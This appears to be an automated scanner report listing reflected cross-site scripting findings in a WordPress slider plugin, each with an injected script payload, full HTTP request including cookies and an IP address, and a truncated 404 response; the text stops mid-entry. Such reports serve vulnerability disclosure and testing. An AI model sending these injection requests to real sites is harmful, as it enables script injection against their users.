GET /site/wp-content/plugins30690"><script>alert(1)</script>04ae898bca/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e0b"><script>alert(1)</script>4f3b7f24e7a was submitted in the REST URL parameter 4. This input was echoed as 86e0b\"><script>alert(1)</script>4f3b7f24e7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat86e0b"><script>alert(1)</script>4f3b7f24e7a/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45505"><script>alert(1)</script>a19c334793e was submitted in the REST URL parameter 5. This input was echoed as 45505\"><script>alert(1)</script>a19c334793e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js45505"><script>alert(1)</script>a19c334793e/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674587+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ed6"><script>alert(1)</script>4a164db4c66 was submitted in the REST URL parameter 6. This input was echoed as b0ed6\"><script>alert(1)</script>4a164db4c66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.jsb0ed6"><script>alert(1)</script>4a164db4c66 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46a7"><script>alert(1)</script>c8efbec0fa1 was submitted in the REST URL parameter 1. This input was echoed as e46a7\"><script>alert(1)</script>c8efbec0fa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitee46a7"><script>alert(1)</script>c8efbec0fa1/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e52"><script>alert(1)</script>c7eda42390 was submitted in the REST URL parameter 2. This input was echoed as d2e52\"><script>alert(1)</script>c7eda42390 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentd2e52"><script>alert(1)</script>c7eda42390/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65a5f"><script>alert(1)</script>825999123a4 was submitted in the REST URL parameter 3. This input was echoed as 65a5f\"><script>alert(1)</script>825999123a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins65a5f"><script>alert(1)</script>825999123a4/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9979"><script>alert(1)</script>228c627681f was submitted in the REST URL parameter 4. This input was echoed as a9979\"><script>alert(1)</script>228c627681f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincata9979"><script>alert(1)</script>228c627681f/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 928f1"><script>alert(1)</script>1c33f9cbad5 was submitted in the REST URL parameter 5. This input was echoed as 928f1\"><script>alert(1)</script>1c33f9cbad5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js928f1"><script>alert(1)</script>1c33f9cbad5/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aba1"><script>alert(1)</script>0cbb2f96b6 was submitted in the REST URL parameter 6. This input was echoed as 3aba1\"><script>alert(1)</script>0cbb2f96b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js3aba1"><script>alert(1)</script>0cbb2f96b6 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f91c"><script>alert(1)</script>89e1dc2587 was submitted in the REST URL parameter 1. This input was echoed as 6f91c\"><script>alert(1)</script>89e1dc2587 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site6f91c"><script>alert(1)</script>89e1dc2587/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674574; expires=Thu, 02-Feb-2012 19:22:54 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 246ce"><script>alert(1)</script>c071be92443 was submitted in the REST URL parameter 2. This input was echoed as 246ce\"><script>alert(1)</script>c071be92443 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content246ce"><script>alert(1)</script>c071be92443/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34091"><script>alert(1)</script>09174c8f3b0 was submitted in the REST URL parameter 3. This input was echoed as 34091\"><script>alert(1)</script>09174c8f3b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins34091"><script>alert(1)</script>09174c8f3b0/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da63"><script>alert(1)</script>ef4ebc3ad8b was submitted in the REST URL parameter 4. This input was echoed as 7da63\"><script>alert(1)</script>ef4ebc3ad8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat7da63"><script>alert(1)</script>ef4ebc3ad8b/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a778"><script>alert(1)</script>914349c7fa1 was submitted in the REST URL parameter 5. This input was echoed as 3a778\"><script>alert(1)</script>914349c7fa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js3a778"><script>alert(1)</script>914349c7fa1/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
